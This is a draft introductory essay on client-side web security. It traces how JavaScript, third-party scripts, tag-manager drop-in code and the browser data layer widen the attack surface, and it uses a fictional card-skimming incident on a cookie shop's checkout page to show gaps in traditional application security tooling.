An Intro to Client-Side Security

The following content is in draft form and may not yet be complete. If you wish to provide feedback or see something that needs correcting, please reach out and let me know.

What is this Monster You Speak of?

When was the last time you bought something online? If I were to make a wager, I’d say it was sometime in the last 24 hours. I myself have a problem and am constantly buying things from Target online (mostly because we have three young kids there is always something we forgot to pick up).

The thing is, most of us interact with different websites or web applications all day long without even consciously thinking about it. You sign into an account. Perhaps you sign up for a newsletter. Or maybe you forgot one last thing at Target and needed to place one more Instacart order. Regardless of the “why”, the fact remains that most people spend a significant portion of their time using web applications.

What you may not realize however, is the amount of data that you generate as you traverse different digital experiences each and every day. That web page you just loaded, generated hundreds of events within your browser…all without you even noticing. Remember that web application you just logged into (through a sign in form)? They generate events too. More interestingly though, they also collect data. Your data. Where it goes, and who has access to it, is often invisible to the human eye.

And now we’ve arrived at our problem. You see, there is this monster that lives within your browser. You don’t know that it’s there, but it sleeps quietly, waiting for the right moment to show its head. Whether it’s stealing cookies, skimming your data, or just tracking your activity, this monster is wreaking havoc without you even noticing.

I’m of course referring to the monster in the browser.

How Did We Get Here?

We are getting ahead of ourselves though; let’s go back to the beginning to a time before the monster in the browser even existed. Long ago at the dawn of the internet, web pages used to be very static in nature. When you requested a web page, what you saw is what you got. It wasn’t until the year 2000 that web pages started to become more dynamic in nature.

In the year 2005, JavaScript use exploded and started showing up on every web page across the web. Suddenly, websites and web applications alike became more dynamic overnight. It probably helped that JavaScript was shipped by default with two of the most popular browsers at the time; Netscape and Internet Explorer. Fast forward to today, JavaScript powers approximately 98% of all websites and web applications; a de facto language of the web if you will. Yeah, it’s that big.

As JavaScript’s popularity grew, naturally developers and organizations wanted to put their own touch on it by creating their own plugins and libraries. In fact, JavaScript became so popular that it gave rise to several front-end and back-end frameworks! These frameworks power some of the world’s largest web applications which is further testament to how pervasive JavaScript has become. Today there are currently 80+ major JavaScript frameworks and tens of thousands of JavaScript libraries.

Placeholder: The growth of JavaScript from a single language to massive ecosystem.

JavaScript’s immense popularity hasn’t been without its challenges though. Like all popular programming languages that also have massive ecosystems, several challenges have surfaced that plague both individual developers and organizations. These challenges include:

  • Vendor lock in
  • Upgrade hell
  • Scalability limitations
  • Performance challenges

None of these are unique to JavaScript, and you’ll run into most of them as your web application grows and accumulates technical debt, but one item that is notably absent from this list is security. Like any programming language there are bound to be vulnerabilities. But JavaScript has a unique twist because it can exist both on the back-end and the front-end. It’s the front-end, or what we will refer to as the “client-side” going forward, that should give organizations pause. But before we talk about security of the client-side…perhaps we should explore exactly how the client-side itself came to be.

The Birth of the Client-Side

When JavaScript was in its infancy the client-side wasn’t that big (because web pages were so static). It wasn’t until 2006 when libraries like jquery, one of the most popular and pervasive JavaScript libraries, came about that we were able to do fancy dynamic things within the client-side. As JavaScript has grown up over the years though, more business logic and functionality was shifted to the client-side as a way to improve web application performance and enhance the end user’s digital experience. But something else happened along the way too; complexity.

A third-party JavaScript library here. An open source JavaScript plugin there. A new JavaScript framework every few months. See, the modern web is not only highly dynamic, but it is also incredibly complex. Digital experiences today are often an overlap of multiple technologies in addition to third-party services. These third-parties can be consumed in a variety of ways; directly into the code base, through a snippet of JavaScript code that calls out to a third-party domain, or from a technique known as “side-loading”. This complexity ultimately creates trust issues within your (client-side) supply chain and introduces increased risk each time a new element is introduced into the chain.

But wait, there’s more! Typically when developers build websites or web applications they have the ability to include or exclude any code, library, or service that they want. After all they are the ones writing the code. However, once the website or web application goes live, other parts of the business will have their own requirements that need to be taken into account. For example, marketing might want to include social media tools for advertising or analytics code to measure web traffic. Product teams might want to understand performance data and how users interact with the website or web application.

Each of these additional tools could be added directly into the code base by the development team, but that often isn’t the case. Instead, the use of a “container”, like Google Tag Manager, is introduced. The development team can add the container code once and then different teams can directly add their tools to the web application through Google Tag Manager. This cuts down on the requests to the development team and empowers the rest of the business to add or remove tools faster at their discretion. The ability for different business units to insert their own tools directly through a container is known as “drop-in code”…which unsurprisingly creates another layer of complexity within the client-side (and more risk as well).

Placeholder: Image of client-side complexity from both developed code and drop-in code.

Finally, we have something known as the data layer. This very thin layer exists within the client-side of your browser holding any data before it is submitted to the back-end where the data is ultimately sent for processing or storage. Imagine you are filling out a form or signing into an application; the information you type into the form fields exists within the data layer from the moment you press a key down.

Placeholder: Image of the different client-side layers within a browser.

So if we put it all together we now have a mashup of code, from first-parties and third-parties + drop-in code from the different business units + data that is being captured within the browser (data layer). And I have a headache.

The client-side didn’t start out as a massive complex beast, but it sure has evolved into one over time. And now that we know how it came to be, let’s go back and spotlight the growing risks that stem from this beast.

The (Growing) Invisible Threat

Alright, so we have established that there are growing risks within the client-side, but what exactly do they look like? Well, each time you visit a webpage, it is no longer compiled on the back-end and delivered…but rather it is assembled in real-time as you request the page. This real-time assembly means that you won’t see risks in the traditional sense because they don’t occur until the webpage is rendered.

Placeholder: Image of how the client-side is assembled in real-time.

Why exactly do traditional security tools miss these risks? Mostly because the client-side wasn’t an attack surface that existed until fairly recently. Around the year 2010, everyone was starting to buy into the idea of cloud computing and migrating their workloads out of the data center. Just five short years later and SaaS consumption also exploded; security had to be reimagined to protect users, data, applications, and systems beyond the traditional security perimeter. Once we bought into the idea that the perimeter was gone, security programs began to change:

  • We invested in protection for cloud workloads inside various cloud environments
  • We secured enterprise SaaS applications and wangled the remaining shadow IT
  • We begin investing more heavily in application security testing (of the back-end)
  • We built various protections into the CI/CD pipeline to protect code and API keys
  • We deployed endpoint security everywhere because people could work from anywhere

Unfortunately we forgot about the browser itself (and what happens inside of it). It’s no one’s fault really, cybersecurity changes at such a rapid pace and there is only so much time and money any one organization can invest. You have to make investments where you’ll have the greatest impact of risk reduction to the business. But for client-side security we have reached the tipping point; not just because of the growing risks it poses to organizations, but because of how prevalent the threat itself has become.

Where Application Security Currently Fall Short

Imagine for a minute that you are building a new web application where people can order warm chocolate chip cookies to be delivered right to their front door (I would totally subscribe to this). As we set out to develop, deploy, and maintain this web application we want to ensure that we build in application security testing and protections along the way. Ignoring cost and human capital for a minute, here is what this might look like:

  1. We start with Static Application Security Testing (SAST) of the code we have written. This should call out logic flaws and code vulnerabilities.

  2. Next, we’ll layer in Software Composition Analysis (SCA) which will help identify all the open source components in our code (and possible vulnerabilities).

  3. Using the results from the previous two steps, let’s go ahead and make sure we update or patch any software components / libraries that might have vulnerabilities.

  4. Before we push our code to the staging environment, we’ll use a few DevSecOps tools to look for and stripe out secrets, API keys, certificates, encryption keys, etc. from all code repositories.

  5. Once the application is deployed to staging we will begin using Dynamic Application Security Testing (DAST) to again find logic flaws and code vulnerabilities, only this time for the deployed running code.

  6. Things are looking good, we go ahead and push our application to production and make sure it comes up with a valid SSL certificate as well.

  7. Now that our application is in production, we want to layer in some protections for it. Let’s go ahead and deploy a Web Application Firewall (WAF), Bot Protection, and API Protection.

  8. Lastly, we don’t want to have downtime from resource draining attacks so we implement DDoS protection and advanced rate limiting.

Whew. That was a lot to deploy and I’m only typing it out! Imagine what it’s like for security practitioners that have to deploy, configure, operate, and maintain all of these tools, particularly if an organization has a large application portfolio! Definitely adds some perspective. Back to our (fictitious) cookie web application. It’s finally live, we start to advertise on social media networks, we text all of our friends to come try it out, and submit a link / description to hacker news. Our efforts pay off and the orders start rolling in! I mean come on, who doesn’t like chocolate chip cookies?!

Suddenly you get an email from a customer that their credit card was used for a bunch of purchases they didn’t authorize…all of which started shortly after they bought cookies on your website. Must be a coincidence. But, then another two emails roll in with similar complaints. Alright, something is up. You call in all members of the security team and ask everyone to start investigating. Nothing in the logs, no critical vulnerabilities that anyone can find, no spikes in traffic from strange locations. Now the security team starts picking apart the payment page(s) and checkout workflows by hand. What’s changed? Has anything recently been added to the checkout workflow by other business units?

After hours of manually reviewing code, third-party libraries, network requests, and several tests your team narrowed down the issue to an analytics tool that the marketing team uses to measure customer conversions during checkout (sorry marketers I had to pick on someone). The JavaScript file had been modified to include additional code that was (digitally) skimming customer credit cards during the checkout process. You notify the vendor that developed the library and they begin to take the corrective actions to mitigate the issue.

Once the incident is over you bring all the teams together for some retrospective learnings to see what could have been done to prevent this threat and what lessons can be carried forward. Here are the observations from the team:

  • This wasn’t a vulnerability so it isn’t something that our current tooling can scan for to detect in the future
  • Because the tool was a SaaS service that anyone can sign up for and deploy, there was no third-party risk management governance around the vendor
  • The issue existed in our third-party supply chain, but in a unique way because it falls outside the scope of development and application security (it only exists in the client-side code)
  • If a single change to a third-party JavaScript library can cause this big of an issue, how do we inventory and understand what other JavaScript libraries exist across our web application?
  • Even if we had a list of all JavaScript libraries, how do we understand what they are doing? Most JavaScript (third-party) libraries aren’t human readable and only trigger in a live environment like production
  • Because the attack happened in the client-side, there are no logs or events to review and the credit card data was stolen before the form was submitted to the back-end where it would have passed through our application security protections

It’s that last point that we all need to sit with for a moment; go ahead, I’ll wait. While this story was meant to highlight the growing risks within the client-side, it does illustrate how these “invisible” risks are going to force us to expand how we think about protecting web applications and the complex digital experiences that they deliver. Additionally, this is no longer just an application security issue either. We’ve seen in the media several social media companies that have been slapped with fines for “inadvertently” collecting data without the consent of companies or end users. These are not threats in the traditional sense, but the impact is just as real.

Note: The risk to privacy is the second largest digital threat that most organizations are completely unprepared for.

So why then do we continue to use third-party code when it introduces so much risk? Well, there are actually some pretty powerful benefits:

  • Cost savings
  • Faster time to market
  • Code reusability
  • Greater functionality

While it’s hard to argue with these benefits from a business perspective, you can hopefully see from our cookie selling story that the security problem within the client-side is unfortunately a growing problem that not enough organizations are focusing on currently. The focus of the organization is growth, whether through launching new web applications or expanding the features of existing ones. But as more features are added, more capabilities offered, the complexity reaches a point where, without realizing it, a (client-side) monster is born.

Return Home →